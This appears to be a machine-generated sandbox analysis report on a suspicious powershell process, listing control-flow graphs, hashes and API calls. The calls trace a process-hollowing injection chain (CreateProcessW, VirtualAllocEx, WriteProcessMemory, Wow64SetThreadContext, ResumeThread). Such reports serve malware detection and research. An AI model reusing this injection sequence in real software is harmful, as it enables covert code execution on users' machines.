                                                                                                            execution_graph 10814 4669e57 10815 4669e41 10814->10815 10816 4669efd 10815->10816 10819 4669f66 10815->10819 10817 4669f55 10820 4669f9e 10819->10820 10821 4669f97 10819->10821 10820->10821 10824 466a525 10820->10824 10848 466a8a0 10820->10848 10821->10817 10826 466a8a1 10824->10826 10831 466afa4 10826->10831 10872 46693f4 10826->10872 10827 466b185 CreateProcessW 10830 466b1f9 10827->10830 10828 466a9a8 10829 4669400 Wow64SetThreadContext 10828->10829 10828->10831 10833 466aa13 10829->10833 10831->10827 10832 466ae98 10831->10832 10832->10820 10833->10831 10833->10832 10834 466ab26 VirtualAllocEx 10833->10834 10835 466ab73 10834->10835 10835->10831 10836 466abc1 VirtualAllocEx 10835->10836 10837 466ac15 10835->10837 10836->10837 10837->10831 10837->10832 10838 4669418 WriteProcessMemory 10837->10838 10839 466ac5f 10838->10839 10839->10831 10839->10832 10840 466ada9 10839->10840 10847 4669418 WriteProcessMemory 10839->10847 10840->10831 10841 4669418 WriteProcessMemory 10840->10841 10842 466add2 10841->10842 10842->10831 10842->10832 10843 4669424 Wow64SetThreadContext 10842->10843 10844 466ae47 10843->10844 10844->10831 10845 466ae4f 10844->10845 10845->10832 10846 466ae58 ResumeThread 10845->10846 10846->10832 10847->10839 10849 466a91d 10848->10849 10850 46693f4 CreateProcessW 10849->10850 10858 466afa4 10849->10858 10852 466a9a8 10850->10852 10851 466b185 CreateProcessW 10854 466b1f9 10851->10854 10852->10858 10876 4669400 10852->10876 10855 466aa13 10856 466ab26 VirtualAllocEx 10855->10856 10855->10858 10860 466ae98 10855->10860 10857 466ab73 10856->10857 10857->10858 10859 466abc1 VirtualAllocEx 10857->10859 10861 466ac15 10857->10861 10858->10851 10858->10860 10859->10861 10860->10820 10861->10858 10861->10860 10880 4669418 10861->10880 10863 466ac5f 10863->10858 10863->10860 10864 466ada9 10863->10864 10871 4669418 WriteProcessMemory 10863->10871 10864->10858 10865 4669418 WriteProcessMemory 10864->10865 10866 466add2 10865->10866 10866->10858 10866->10860 10884 4669424 10866->10884 10869 466ae4f 10869->10860 10870 466ae58 ResumeThread 10869->10870 10870->10860 10871->10863 10873 466b0a0 CreateProcessW 10872->10873 10875 466b1f9 10873->10875 10877 466b2e0 Wow64SetThreadContext 10876->10877 10879 466b35a 10877->10879 10879->10855 10881 466b458 WriteProcessMemory 10880->10881 10883 466b4e3 10881->10883 10883->10863 10885 466b2e0 Wow64SetThreadContext 10884->10885 10887 466ae47 10885->10887 10887->10858 10887->10869

                                                                                                            Executed Functions

                                                                                                            Function 0466A8A0 Relevance: 6.7, APIs: 4, Instructions: 663memoryprocessthreadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 387 466a8a0-466a951 391 466a957-466a967 387->391 392 466b089-466b119 387->392 395 466a970 391->395 396 466a969-466a96e 391->396 399 466b121-466b128 392->399 400 466b11b-466b11e 392->400 398 466a972-466a974 395->398 396->398 401 466a976-466a989 398->401 402 466a98b-466a9aa call 46693f4 398->402 403 466b133-466b149 399->403 404 466b12a-466b130 399->404 400->399 401->402 411 466a9b3 402->411 412 466a9ac-466a9b1 402->412 405 466b154-466b1f7 CreateProcessW 403->405 406 466b14b-466b151 403->406 404->403 413 466b200-466b278 405->413 414 466b1f9-466b1ff 405->414 406->405 415 466a9b5-466a9b7 411->415 412->415 435 466b28a-466b291 413->435 436 466b27a-466b280 413->436 414->413 416 466afff-466b012 415->416 417 466a9bd-466a9d2 415->417 428 466b019-466b02f 416->428 422 466affa 417->422 423 466a9d8-466a9fc 417->423 422->416 423->428 431 466aa02-466aa15 call 4669400 423->431 428->392 443 466b031-466b03b 428->443 441 466af9d-466af9f 431->441 442 466aa1b-466aa22 431->442 437 466b293-466b2a2 435->437 438 466b2a8 435->438 436->435 437->438 447 466b2a9 438->447 445 466af83-466af96 442->445 446 466aa28-466aa32 442->446 450 466b046-466b048 443->450 451 466b03d-466b044 443->451 445->441 446->428 448 466aa38-466aa55 446->448 447->447 448->422 453 466aa5b-466aa75 call 466940c 448->453 454 466b04a-466b04e 450->454 451->454 461 466afa4 453->461 462 466aa7b-466aa82 453->462 456 466b055-466b062 454->456 457 466b050 call 46685f4 454->457 472 466b064 456->472 473 466b069-466b086 456->473 457->456 468 466afab 461->468 464 466aa88-466aa91 462->464 465 466af69-466af7c 462->465 466 466aa93-466aad7 464->466 467 466aafc-466ab02 464->467 465->445 478 466aae0-466aaec 466->478 479 466aad9-466aadf 466->479 467->422 469 466ab08-466ab18 467->469 475 466afb5 468->475 469->422 482 466ab1e-466ab71 VirtualAllocEx 469->482 472->473 480 466afbc 475->480 478->468 481 466aaf2-466aaf6 478->481 479->478 485 466afc3 480->485 481->467 484 466af4f-466af62 481->484 488 466ab73-466ab79 482->488 489 466ab7a-466ab98 482->489 484->465 490 466afca 485->490 488->489 489->475 491 466ab9e-466aba5 489->491 497 466afd1 490->497 494 466ac2c-466ac33 491->494 495 466abab-466abb2 491->495 494->485 498 466ac39-466ac40 494->498 495->480 496 466abb8-466abbf 495->496 496->494 499 466abc1-466ac13 VirtualAllocEx 496->499 504 466afdb 497->504 500 466ac46-466ac61 call 4669418 498->500 501 466af35-466af48 498->501 502 466ac15-466ac1b 499->502 503 466ac1c-466ac26 499->503 500->490 510 466ac67-466ac6e 500->510 501->484 502->503 503->494 509 466afe2 504->509 514 466afe9 509->514 512 466ac74-466ac7d 510->512 513 466af1b-466af2e 510->513 512->422 515 466ac83-466ac89 512->515 513->501 518 466aff3 514->518 515->422 517 466ac8f-466ac9a 515->517 517->422 521 466aca0-466aca6 517->521 518->422 522 466acac-466acb1 521->522 523 466ada9-466adba 521->523 522->422 524 466acb7-466acca 522->524 523->422 527 466adc0-466add4 call 4669418 523->527 524->422 528 466acd0-466ace3 524->528 527->509 531 466adda-466ade1 527->531 528->422 535 466ace9-466acfe 528->535 533 466aee7-466aefa 531->533 534 466ade7-466aded 531->534 549 466af01-466af14 533->549 534->422 536 466adf3-466ae04 534->536 535->497 540 466ad04-466ad08 535->540 536->514 542 466ae0a-466ae0e 536->542 543 466ad0e-466ad17 540->543 544 466ad8f-466ad92 540->544 545 466ae10-466ae13 542->545 546 466ae19-466ae21 542->546 543->422 548 466ad1d-466ad20 543->548 544->422 547 466ad98-466ad9b 544->547 545->546 546->422 550 466ae27-466ae31 546->550 547->422 551 466ada1-466ada3 547->551 548->422 552 466ad26-466ad56 548->552 549->513 550->428 553 466ae37-466ae49 call 4669424 550->553 551->522 551->523 552->422 561 466ad5c-466ad75 call 4669418 552->561 553->518 560 466ae4f-466ae56 553->560 562 466aeb3-466aec6 560->562 563 466ae58-466ae96 ResumeThread 560->563 570 466ad7a-466ad7c 561->570 568 466aecd-466aee0 562->568 565 466ae9f-466aeac 563->565 566 466ae98-466ae9e 563->566 567 466aeae 565->567 565->568 566->565 567->472 568->533 570->504 572 466ad82-466ad89 570->572 572->544 572->549
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 0466AB5A
                                                                                                            • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 0466ABFC
                                                                                                              • Part of subcall function 04669418: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18732514,00000000,?,?,?,00000000,00000000,?,0466AC5F,?,00000000,?), ref: 0466B4D4
                                                                                                            • ResumeThread.KERNELBASE(?), ref: 0466AE7F
                                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0466B1E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 4270437565-0
                                                                                                            • Opcode ID: 7e78eb22068423700849a1d3f6f396e6ecda54f54d81616c7a018d044570565b
                                                                                                            • Instruction ID: dec551aa8bf428654cf20b8029f891cb1cd42aa1a0f9d7cc79c1385a0547796c
                                                                                                            • Opcode Fuzzy Hash: 7e78eb22068423700849a1d3f6f396e6ecda54f54d81616c7a018d044570565b
                                                                                                            • Instruction Fuzzy Hash: BF42A170A00219DFEB24DFA5D854B9DB7F2AF85304F1481ADD90AA7390EB34AE85CF51
                                                                                                            Function 04669F66 Relevance: 2.9, Strings: 2, Instructions: 447COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 872 4669f66-4669f95 873 4669f97-4669f99 872->873 874 4669f9e-4669fae 872->874 875 466a26a-466a271 873->875 876 4669fb5-4669fc5 874->876 877 4669fb0 874->877 879 466a251-466a25f 876->879 880 4669fcb-4669fd9 876->880 877->875 883 466a272-466a34d 879->883 885 466a261-466a265 call 4661fb0 879->885 880->883 884 4669fdf 880->884 957 466a34f-466a355 883->957 958 466a35a-466a362 883->958 884->883 886 4669fe6-4669ff5 884->886 887 466a0e7-466a108 884->887 888 466a167-466a1a6 884->888 889 466a204-466a21f call 4660318 884->889 890 466a245-466a24f 884->890 891 466a0c1-466a0e2 884->891 892 466a221-466a243 884->892 893 466a04e-466a070 884->893 894 466a10d-466a135 884->894 895 466a1ab-466a1d1 884->895 896 466a028-466a049 884->896 897 466a1d6-466a202 884->897 898 466a075-466a096 884->898 899 466a13a-466a162 884->899 900 466a09b-466a0bc 884->900 885->875 918 4669ff7-466a00c 886->918 919 466a00e-466a01d 886->919 887->875 888->875 889->875 890->875 891->875 892->875 893->875 894->875 895->875 896->875 897->875 898->875 899->875 900->875 940 466a023 918->940 919->940 940->875 959 466a40e-466a415 957->959 960 466a364-466a36a 958->960 961 466a36f-466a375 958->961 960->959 962 466a416 961->962 963 466a37b-466a382 961->963 966 466a41b-466a430 962->966 964 466a384-466a398 963->964 965 466a3f5-466a409 call 4661fb0 963->965 970 466a39b-466a3a0 964->970 965->959 971 466a432-466a442 966->971 972 466a46f-466a472 966->972 970->966 973 466a3a2-466a3ad 970->973 975 466a447-466a450 971->975 976 466a3c1 973->976 977 466a3af-466a3b8 973->977 999 466a452 call 466a525 975->999 1000 466a452 call 466a8a0 975->1000 981 466a3c8-466a3cb 976->981 977->966 979 466a3ba-466a3bf 977->979 979->981 980 466a458-466a45a 982 466a460 980->982 983 466a45c-466a45e 980->983 984 466a3dc-466a3e9 981->984 985 466a3cd-466a3d0 981->985 986 466a465-466a467 982->986 983->986 984->959 985->984 987 466a3d2-466a3d5 985->987 988 466a473-466a476 986->988 989 466a469-466a46e 986->989 987->984 990 466a3d7-466a3da 987->990 992 466a484-466a4bc 988->992 993 466a478-466a47b 988->993 989->972 990->984 994 466a3eb-466a3ee 990->994 993->975 995 466a47d-466a483 993->995 994->962 996 466a3f0-466a3f3 994->996 996->965 996->970 999->980 1000->980
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Xq$$q
                                                                                                            • API String ID: 0-855381642
                                                                                                            • Opcode ID: 3e8ef07e74d21ef8703b75a2c51dc66ed84e6ce7000721b90fa24ec2cbe556b6
                                                                                                            • Instruction ID: 50469d109414f9ff15a6e1cf8eb02082f81ad8b09c2ff1bc453654ef6d6e0a83
                                                                                                            • Opcode Fuzzy Hash: 3e8ef07e74d21ef8703b75a2c51dc66ed84e6ce7000721b90fa24ec2cbe556b6
                                                                                                            • Instruction Fuzzy Hash: 92E10430B092549FDB189BB9985467E7BB6FF86300F09846ED447E7385EE39AC038791
                                                                                                            Function 07592DE0 Relevance: 14.3, Strings: 11, Instructions: 594COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (oq$(oq$4'q$4'q$4'q$4'q$4'q$4'q$$q$$q$$q
                                                                                                            • API String ID: 0-3026883538
                                                                                                            • Opcode ID: 97540173e06b747299862f00486955c0dd885e4845298da8aa2796de587f14a3
                                                                                                            • Instruction ID: a0266674e9992ac8d37970fea8c1d06b40af05189f3dd8148e53ddce432d0c24
                                                                                                            • Opcode Fuzzy Hash: 97540173e06b747299862f00486955c0dd885e4845298da8aa2796de587f14a3
                                                                                                            • Instruction Fuzzy Hash: 161213B0B0420ADFDF258B69D8447EABBA2FF85211F14C47BE8558B251DB36D842CB91
                                                                                                            Function 07592268 Relevance: 12.8, Strings: 10, Instructions: 348COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 178 7592268-759228e 179 759243a-7592482 178->179 180 7592294-7592299 178->180 194 7592488-759248d 179->194 195 75925b4-75925e5 179->195 181 759229b-75922a1 180->181 182 75922b1-75922b5 180->182 183 75922a2-75922a3 181->183 184 75922a5-75922af 181->184 185 75922bb-75922bd 182->185 186 75923e6-75923f0 182->186 183->182 184->182 188 75922cd 185->188 189 75922bf-75922cb 185->189 191 75923fe-7592404 186->191 192 75923f2-75923fb 186->192 193 75922cf-75922d1 188->193 189->193 197 759240a-7592416 191->197 198 7592406-7592408 191->198 193->186 199 75922d7-75922db 193->199 200 759248f-7592495 194->200 201 75924a5-75924a9 194->201 214 75925f5 195->214 215 75925e7-75925f3 195->215 202 7592418-7592437 197->202 198->202 204 75922dd-75922ec 199->204 205 75922ee 199->205 206 7592499-75924a3 200->206 207 7592497 200->207 209 75924af-75924b1 201->209 210 7592566-7592570 201->210 216 75922f0-75922f2 204->216 205->216 206->201 207->201 211 75924c1 209->211 212 75924b3-75924bf 209->212 217 759257d-7592583 210->217 218 7592572-759257a 210->218 219 75924c3-75924c5 211->219 212->219 220 75925f7-75925f9 214->220 215->220 216->186 223 75922f8-75922fa 216->223 221 7592589-7592595 217->221 222 7592585-7592587 217->222 219->210 225 75924cb-75924cd 219->225 228 75925fb-759261a 220->228 229 7592667-7592671 220->229 227 7592597-75925b1 221->227 222->227 230 759230a 223->230 231 75922fc-7592308 223->231 232 75924cf-75924d5 225->232 233 75924e7-75924e9 225->233 265 759262a 228->265 266 759261c-7592628 228->266 234 759267a-7592680 229->234 235 7592673-7592677 229->235 236 759230c-759230e 230->236 231->236 240 75924d9-75924e5 232->240 241 75924d7 232->241 248 75924f0-75924f2 233->248 238 7592682-7592684 234->238 239 7592686-7592692 234->239 236->186 244 7592314-7592316 236->244 247 7592694-75926b2 238->247 239->247 240->233 241->233 245 7592318-759231e 244->245 246 7592330-759233b 244->246 249 7592320 245->249 250 7592322-759232e 245->250 251 759234a-7592356 246->251 252 759233d-7592340 246->252 255 759250a-7592563 248->255 256 75924f4-75924fa 248->256 249->246 250->246 260 7592358-759235a 251->260 261 7592364-7592374 251->261 252->251 263 75924fc 256->263 264 75924fe-7592500 256->264 260->261 272 759238c-75923e3 261->272 273 7592376-759237c 261->273 263->255 264->255 268 759262c-759262e 265->268 266->268 268->229 269 7592630-759264d 268->269 278 759264f-7592661 269->278 279 75926b5-75926ba 269->279 275 759237e 273->275 276 7592380-7592382 273->276 275->272 276->272 278->229 279->278
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                                                                                                            • API String ID: 0-4104424984
                                                                                                            • Opcode ID: de9141c877240e0ecbc29f1a85931fa527c2d5763777a03c13a13ec1fae7e5f8
                                                                                                            • Instruction ID: 066e386a142e852e3fbc1f0ad11339b1af2a87f6d0bb32696e889d2d67547d7f
                                                                                                            • Opcode Fuzzy Hash: de9141c877240e0ecbc29f1a85931fa527c2d5763777a03c13a13ec1fae7e5f8
                                                                                                            • Instruction Fuzzy Hash: C4B108B5B0430AFFDF259A6998107FABBE6BF85211F14847BD809CB241DB35C942C7A1
                                                                                                            Function 075903E0 Relevance: 9.1, Strings: 7, Instructions: 359COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 281 75903e0-7590403 282 7590409-759040e 281->282 283 75905de-7590623 281->283 284 7590410-7590416 282->284 285 7590426-759042a 282->285 293 7590629-759062e 283->293 294 759077a-75907ad 283->294 286 7590418 284->286 287 759041a-7590424 284->287 288 759058b-7590595 285->288 289 7590430-7590434 285->289 286->285 287->285 295 75905a3-75905a9 288->295 296 7590597-75905a0 288->296 291 7590447 289->291 292 7590436-7590445 289->292 300 7590449-759044b 291->300 292->300 301 7590630-7590636 293->301 302 7590646-759064a 293->302 313 75907bd 294->313 314 75907af-75907bb 294->314 297 75905ab-75905ad 295->297 298 75905af-75905bb 295->298 303 75905bd-75905db 297->303 298->303 300->288 307 7590451-7590471 300->307 308 7590638 301->308 309 759063a-7590644 301->309 304 7590650-7590652 302->304 305 7590727-7590731 302->305 311 7590662 304->311 312 7590654-7590660 304->312 315 759073f-7590745 305->315 316 7590733-759073c 305->316 341 7590490 307->341 342 7590473-759048e 307->342 308->302 309->302 318 7590664-7590666 311->318 312->318 320 75907bf-75907c1 313->320 314->320 322 759074b-7590757 315->322 323 7590747-7590749 315->323 318->305 324 759066c-7590670 318->324 325 759080d-7590817 320->325 326 75907c3-75907c9 320->326 327 7590759-7590777 322->327 323->327 331 7590690 324->331 332 7590672-759068e 324->332 329 7590819-759081f 325->329 330 7590822-7590828 325->330 334 75907cb-75907cd 326->334 335 75907d7-75907f4 326->335 338 759082a-759082c 330->338 339 759082e-759083a 330->339 340 7590692-7590694 331->340 332->340 334->335 349 759085a-759085f 335->349 350 75907f6-7590807 335->350 345 759083c-7590857 338->345 339->345 340->305 347 759069a-75906b5 340->347 344 7590492-7590494 341->344 342->344 344->288 351 759049a-759049c 344->351 365 75906cd-7590724 347->365 366 75906b7-75906bd 347->366 349->350 350->325 355 75904ac 351->355 356 759049e-75904aa 351->356 361 75904ae-75904b0 355->361 356->361 361->288 363 75904b6-75904d6 361->363 372 75904d8-75904de 363->372 373 75904ee-75904f2 363->373 367 75906bf 366->367 368 75906c1-75906c3 366->368 367->365 368->365 374 75904e0 372->374 375 75904e2-75904e4 372->375 376 759050c-7590510 373->376 377 75904f4-75904fa 373->377 374->373 375->373 380 7590517-7590519 376->380 378 75904fc 377->378 379 75904fe-759050a 377->379 378->376 379->376 381 759051b-7590521 380->381 382 7590531-7590588 380->382 384 7590523 381->384 385 7590525-7590527 381->385 384->382 385->382
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q
                                                                                                            • API String ID: 0-1721289453
                                                                                                            • Opcode ID: fac86270461bdb0e1c4fbb3681c06bfcd25741c631acd074e60d96153aec8314
                                                                                                            • Instruction ID: 5888a4226cce8703bf5a0ba8e63bafb930d93989c69df5636b9ed92f1243c211
                                                                                                            • Opcode Fuzzy Hash: fac86270461bdb0e1c4fbb3681c06bfcd25741c631acd074e60d96153aec8314
                                                                                                            • Instruction Fuzzy Hash: 89B106B5B002079FEF249A6598107EABBE5BF85215F24887BD84DCB2C1DB35D842C791
                                                                                                            Function 0466A525 Relevance: 5.3, APIs: 3, Instructions: 821COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 576 466a525-466a951 581 466a957-466a967 576->581 582 466b089-466b119 576->582 585 466a970 581->585 586 466a969-466a96e 581->586 589 466b121-466b128 582->589 590 466b11b-466b11e 582->590 588 466a972-466a974 585->588 586->588 591 466a976-466a989 588->591 592 466a98b-466a9aa call 46693f4 588->592 593 466b133-466b149 589->593 594 466b12a-466b130 589->594 590->589 591->592 601 466a9b3 592->601 602 466a9ac-466a9b1 592->602 595 466b154-466b1f7 CreateProcessW 593->595 596 466b14b-466b151 593->596 594->593 603 466b200-466b278 595->603 604 466b1f9-466b1ff 595->604 596->595 605 466a9b5-466a9b7 601->605 602->605 625 466b28a-466b291 603->625 626 466b27a-466b280 603->626 604->603 606 466afff-466b012 605->606 607 466a9bd-466a9d2 605->607 618 466b019-466b02f 606->618 612 466affa 607->612 613 466a9d8-466a9fc 607->613 612->606 613->618 621 466aa02-466aa15 call 4669400 613->621 618->582 633 466b031-466b03b 618->633 631 466af9d-466af9f 621->631 632 466aa1b-466aa22 621->632 627 466b293-466b2a2 625->627 628 466b2a8 625->628 626->625 627->628 637 466b2a9 628->637 635 466af83-466af96 632->635 636 466aa28-466aa32 632->636 640 466b046-466b048 633->640 641 466b03d-466b044 633->641 635->631 636->618 638 466aa38-466aa55 636->638 637->637 638->612 643 466aa5b-466aa75 call 466940c 638->643 644 466b04a-466b04e 640->644 641->644 651 466afa4 643->651 652 466aa7b-466aa82 643->652 646 466b055-466b062 644->646 647 466b050 call 46685f4 644->647 662 466b064 646->662 663 466b069-466b086 646->663 647->646 658 466afab 651->658 654 466aa88-466aa91 652->654 655 466af69-466af7c 652->655 656 466aa93-466aad7 654->656 657 466aafc-466ab02 654->657 655->635 668 466aae0-466aaec 656->668 669 466aad9-466aadf 656->669 657->612 659 466ab08-466ab18 657->659 665 466afb5 658->665 659->612 672 466ab1e-466ab71 VirtualAllocEx 659->672 662->663 670 466afbc 665->670 668->658 671 466aaf2-466aaf6 668->671 669->668 675 466afc3 670->675 671->657 674 466af4f-466af62 671->674 678 466ab73-466ab79 672->678 679 466ab7a-466ab98 672->679 674->655 680 466afca 675->680 678->679 679->665 681 466ab9e-466aba5 679->681 687 466afd1 680->687 684 466ac2c-466ac33 681->684 685 466abab-466abb2 681->685 684->675 688 466ac39-466ac40 684->688 685->670 686 466abb8-466abbf 685->686 686->684 689 466abc1-466ac13 VirtualAllocEx 686->689 694 466afdb 687->694 690 466ac46-466ac61 call 4669418 688->690 691 466af35-466af48 688->691 692 466ac15-466ac1b 689->692 693 466ac1c-466ac26 689->693 690->680 700 466ac67-466ac6e 690->700 691->674 692->693 693->684 699 466afe2 694->699 704 466afe9 699->704 702 466ac74-466ac7d 700->702 703 466af1b-466af2e 700->703 702->612 705 466ac83-466ac89 702->705 703->691 708 466aff3 704->708 705->612 707 466ac8f-466ac9a 705->707 707->612 711 466aca0-466aca6 707->711 708->612 712 466acac-466acb1 711->712 713 466ada9-466adba 711->713 712->612 714 466acb7-466acca 712->714 713->612 717 466adc0-466add4 call 4669418 713->717 714->612 718 466acd0-466ace3 714->718 717->699 721 466adda-466ade1 717->721 718->612 725 466ace9-466acfe 718->725 723 466aee7-466aefa 721->723 724 466ade7-466aded 721->724 739 466af01-466af14 723->739 724->612 726 466adf3-466ae04 724->726 725->687 730 466ad04-466ad08 725->730 726->704 732 466ae0a-466ae0e 726->732 733 466ad0e-466ad17 730->733 734 466ad8f-466ad92 730->734 735 466ae10-466ae13 732->735 736 466ae19-466ae21 732->736 733->612 738 466ad1d-466ad20 733->738 734->612 737 466ad98-466ad9b 734->737 735->736 736->612 740 466ae27-466ae31 736->740 737->612 741 466ada1-466ada3 737->741 738->612 742 466ad26-466ad56 738->742 739->703 740->618 743 466ae37-466ae49 call 4669424 740->743 741->712 741->713 742->612 751 466ad5c-466ad75 call 4669418 742->751 743->708 750 466ae4f-466ae56 743->750 752 466aeb3-466aec6 750->752 753 466ae58-466ae96 ResumeThread 750->753 760 466ad7a-466ad7c 751->760 758 466aecd-466aee0 752->758 755 466ae9f-466aeac 753->755 756 466ae98-466ae9e 753->756 757 466aeae 755->757 755->758 756->755 757->662 758->723 760->694 762 466ad82-466ad89 760->762 762->734 762->739
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: af94a7dbf6a9409c4eadebe38c28cc16bda151f81f30cb72ffae2dc01a2fec5f
                                                                                                            • Instruction ID: 9e9634e916be00f02f0afc5700e65592725cf13dc401afdef04360d7cb4318b1
                                                                                                            • Opcode Fuzzy Hash: af94a7dbf6a9409c4eadebe38c28cc16bda151f81f30cb72ffae2dc01a2fec5f
                                                                                                            • Instruction Fuzzy Hash: 84F16F70A00319CFEB24DFA5C854B99B7B6AF85304F1481ADE50AA7391EB70AE85CF51
                                                                                                            Function 075903C0 Relevance: 3.9, Strings: 3, Instructions: 109COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 766 75903c0-7590403 767 7590409-759040e 766->767 768 75905de-7590623 766->768 769 7590410-7590416 767->769 770 7590426-759042a 767->770 778 7590629-759062e 768->778 779 759077a-75907ad 768->779 771 7590418 769->771 772 759041a-7590424 769->772 773 759058b-7590595 770->773 774 7590430-7590434 770->774 771->770 772->770 780 75905a3-75905a9 773->780 781 7590597-75905a0 773->781 776 7590447 774->776 777 7590436-7590445 774->777 785 7590449-759044b 776->785 777->785 786 7590630-7590636 778->786 787 7590646-759064a 778->787 798 75907bd 779->798 799 75907af-75907bb 779->799 782 75905ab-75905ad 780->782 783 75905af-75905bb 780->783 788 75905bd-75905db 782->788 783->788 785->773 792 7590451-7590471 785->792 793 7590638 786->793 794 759063a-7590644 786->794 789 7590650-7590652 787->789 790 7590727-7590731 787->790 796 7590662 789->796 797 7590654-7590660 789->797 800 759073f-7590745 790->800 801 7590733-759073c 790->801 826 7590490 792->826 827 7590473-759048e 792->827 793->787 794->787 803 7590664-7590666 796->803 797->803 805 75907bf-75907c1 798->805 799->805 807 759074b-7590757 800->807 808 7590747-7590749 800->808 803->790 809 759066c-7590670 803->809 810 759080d-7590817 805->810 811 75907c3-75907c9 805->811 812 7590759-7590777 807->812 808->812 816 7590690 809->816 817 7590672-759068e 809->817 814 7590819-759081f 810->814 815 7590822-7590828 810->815 819 75907cb-75907cd 811->819 820 75907d7-75907f4 811->820 823 759082a-759082c 815->823 824 759082e-759083a 815->824 825 7590692-7590694 816->825 817->825 819->820 834 759085a-759085f 820->834 835 75907f6-7590807 820->835 830 759083c-7590857 823->830 824->830 825->790 832 759069a-75906b5 825->832 829 7590492-7590494 826->829 827->829 829->773 836 759049a-759049c 829->836 850 75906cd-7590724 832->850 851 75906b7-75906bd 832->851 834->835 835->810 840 75904ac 836->840 841 759049e-75904aa 836->841 846 75904ae-75904b0 840->846 841->846 846->773 848 75904b6-75904d6 846->848 857 75904d8-75904de 848->857 858 75904ee-75904f2 848->858 852 75906bf 851->852 853 75906c1-75906c3 851->853 852->850 853->850 859 75904e0 857->859 860 75904e2-75904e4 857->860 861 759050c-7590510 858->861 862 75904f4-75904fa 858->862 859->858 860->858 865 7590517-7590519 861->865 863 75904fc 862->863 864 75904fe-759050a 862->864 863->861 864->861 866 759051b-7590521 865->866 867 7590531-7590588 865->867 869 7590523 866->869 870 7590525-7590527 866->870 869->867 870->867
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$$q$$q
                                                                                                            • API String ID: 0-3789935075
                                                                                                            • Opcode ID: ceecd9f5e0e37df63ef7a5fb09c65b94d76f9977a65b5adf35b48a8da9ae93ce
                                                                                                            • Instruction ID: 1c3631c88efde690f16cc0206cf51b730e8e97112091a1dc7417d64c177dd5a5
                                                                                                            • Opcode Fuzzy Hash: ceecd9f5e0e37df63ef7a5fb09c65b94d76f9977a65b5adf35b48a8da9ae93ce
                                                                                                            • Instruction Fuzzy Hash: 1B31FEF0A04203EFEF208A25A4107EA7BE5BF82214F158877D81CDB2C1EB39C980C765
                                                                                                            Function 075909FA Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
